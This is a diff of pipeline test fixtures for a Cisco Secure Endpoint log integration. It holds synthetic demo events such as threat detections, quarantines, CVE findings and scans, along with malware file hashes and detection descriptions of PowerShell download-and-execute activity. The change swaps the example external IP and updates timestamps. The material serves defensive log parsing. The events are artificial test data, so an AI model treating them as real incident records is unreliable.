+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet 
Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft 
Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}}
diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json
index 18a94df069c..38cf5f7a80e 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp1.log-expected.json
@@ -24,7 +24,7 @@
 "128aa78059540cf0cdae2a3cea30cd80e00f2046"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -38,8 +38,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322410226Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", + "ingested": "2021-12-09T13:35:29.222399500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -61,7 +61,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -94,7 +94,7 @@ "Demo_AMP_Threat_Quarantined" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -104,8 +104,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:13:59.322416058Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:29.222408700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -122,7 +122,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -176,7 +176,7 @@ "cf162622e29bca072d01b274fbbc3ceaacdd13c7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -193,8 +193,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322418540Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", + "ingested": "2021-12-09T13:35:29.222414700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT657.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT657.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -216,7 +216,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -261,7 +261,7 @@ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
